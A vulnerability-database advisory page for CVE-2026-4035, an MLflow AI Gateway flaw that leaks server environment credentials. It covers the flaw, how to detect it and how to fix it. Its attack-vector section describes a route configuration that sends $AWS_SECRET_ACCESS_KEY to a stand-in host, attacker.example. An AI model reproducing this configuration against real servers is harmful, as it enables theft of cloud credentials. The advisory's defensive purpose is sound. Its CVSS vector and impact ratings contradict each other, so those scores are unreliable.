A Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection. Six years running.Six years. Gartner® Magic Quadrant™ Leader.Find Out Why
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • AI Data Pipelines
      Security Data Pipeline for AI SIEM and Data Optimization
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2026-4035

CVE-2026-4035: MLflow Information Disclosure Vulnerability

CVE-2026-4035 is an information disclosure vulnerability in MLflow AI Gateway that allows attackers to exfiltrate sensitive server-side environment credentials through malicious gateway secrets. This article covers technical details, affected versions, impact, and mitigation strategies.

Published: June 4, 2026

CVE-2026-4035 Overview

CVE-2026-4035 is an information disclosure vulnerability in mlflow/mlflow versions prior to 3.11.0. The MLflow AI Gateway resolves $ENV_VAR references within the api_key field of gateway secrets at runtime. An attacker can configure a gateway entry pointing at an attacker-controlled api_base and reference any server-side environment variable. MLflow then transmits the resolved value in the provider authentication header to the attacker's endpoint. The flaw is exploitable by low-privileged authenticated users in basic-auth deployments and by unauthenticated users in default deployments. This issue is tracked under [CWE-201: Insertion of Sensitive Information Into Sent Data].

Critical Impact

Attackers can exfiltrate cloud credentials such as AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY from the MLflow server's environment, enabling artifact poisoning and cross-boundary code execution in downstream pipelines.

Affected Products

  • mlflow/mlflow versions prior to 3.11.0
  • MLflow AI Gateway component
  • Default (no basic-auth) and basic-auth deployments

Discovery Timeline

  • 2026-06-03 - CVE-2026-4035 published to NVD
  • 2026-06-03 - Last updated in NVD database
  • 3.11.0 - Fix released in MLflow 3.11.0

Technical Details for CVE-2026-4035

Vulnerability Analysis

The MLflow AI Gateway lets administrators register upstream model providers and store provider credentials in api_key fields. The gateway supports $ENV_VAR references inside these fields so deployments can avoid hardcoding secrets. The resolution occurs server-side during request handling, immediately before MLflow constructs the outbound authentication header to api_base.

The gateway does not restrict which environment variables may be referenced. Any variable accessible to the MLflow server process can be expanded, including cloud provider credentials, database connection strings, and signing keys. After resolution, MLflow forwards the value as a bearer token or API key to the upstream URL the attacker controls.

The attacker captures the authentication header on their endpoint and recovers the plaintext secret. The CVSS scope is Changed because data flows from the MLflow trust boundary into an attacker-controlled system through MLflow's own request logic.

Root Cause

The root cause is unrestricted variable interpolation in gateway secret fields combined with the absence of an allowlist for upstream api_base destinations. MLflow treats $ENV_VAR as a legitimate configuration pattern without verifying the trust level of the consumer.

Attack Vector

In default deployments, an unauthenticated attacker calls the gateway configuration endpoint to register a new route with api_key: $AWS_SECRET_ACCESS_KEY and api_base: https://attacker.example. The attacker then triggers a completion request to that route. MLflow resolves the environment variable and sends it in the Authorization header to the attacker. In basic-auth deployments, any low-privileged authenticated user can perform the same flow. See the Huntr Bounty Listing and GitHub Commit Details for the technical fix.

Detection Methods for CVE-2026-4035

Indicators of Compromise

  • Gateway route definitions containing $ prefixes in api_key fields that reference sensitive variables such as AWS_SECRET_ACCESS_KEY, AZURE_CLIENT_SECRET, or GCP_SERVICE_ACCOUNT.
  • Outbound HTTPS requests from MLflow servers to unrecognized api_base domains not on the organization's approved model-provider list.
  • New gateway routes created by low-privileged accounts or by anonymous sessions in default deployments.

Detection Strategies

  • Audit MLflow gateway configuration files and the gateway database for api_key values starting with $ and correlate them with environment variables present on the host.
  • Monitor MLflow server egress traffic for connections to domains outside the allowlist of legitimate model providers such as OpenAI, Anthropic, and Azure.
  • Review MLflow access logs for POST and PUT requests against gateway route management endpoints, especially from unauthenticated sources.

Monitoring Recommendations

  • Enable verbose logging for the MLflow gateway and ship logs to a SIEM for correlation with network telemetry.
  • Alert on any change to gateway route configuration outside of approved change windows.
  • Track CloudTrail, Azure Activity, or GCP Audit logs for credential usage from IP ranges that do not match the MLflow server, which would indicate stolen-key reuse.

How to Mitigate CVE-2026-4035

Immediate Actions Required

  • Upgrade mlflow/mlflow to version 3.11.0 or later on all servers running the AI Gateway.
  • Rotate every credential exposed to the MLflow server process, including cloud access keys, database passwords, and provider API tokens.
  • Restrict network egress from MLflow hosts to a strict allowlist of legitimate upstream model provider domains.
  • Enable authentication on any MLflow deployment that is currently running without basic-auth.

Patch Information

The fix is included in MLflow 3.11.0. The maintainers removed unrestricted environment variable resolution from gateway secret fields. Review the GitHub Commit Details for the upstream patch.

Workarounds

  • Run the MLflow gateway process with a minimal environment that excludes cloud and database credentials until the patch is applied.
  • Place the gateway behind an authenticating reverse proxy and limit route management endpoints to administrator identities.
  • Use an egress proxy that enforces an allowlist of upstream model provider hostnames, blocking exfiltration to attacker-controlled endpoints.
bash
# Configuration example: pin MLflow to the patched release
pip install --upgrade 'mlflow>=3.11.0'

# Verify the installed version
mlflow --version

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeInformation Disclosure

  • Vendor/TechMlflow

  • SeverityCRITICAL

  • CVSS Score9.1

  • EPSS Probability0.28%

  • Known ExploitedNo
  • CVSS Vector
  • CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityNone
  • AvailabilityLow
  • CWE References
  • CWE-201
  • Technical References
  • GitHub Commit Details

  • Huntr Bounty Listing
  • Related CVEs
  • CVE-2026-2734: MLflow Information Disclosure Vulnerability

  • CVE-2026-2614: MLflow Information Disclosure Vulnerability

  • CVE-2025-15381: MLflow Information Disclosure Vulnerability

  • CVE-2026-10803: MLflow Weak Hash Vulnerability
Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the Most Advanced Cybersecurity Platform

See how the world’s most intelligent, autonomous cybersecurity platform can protect your organization today and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English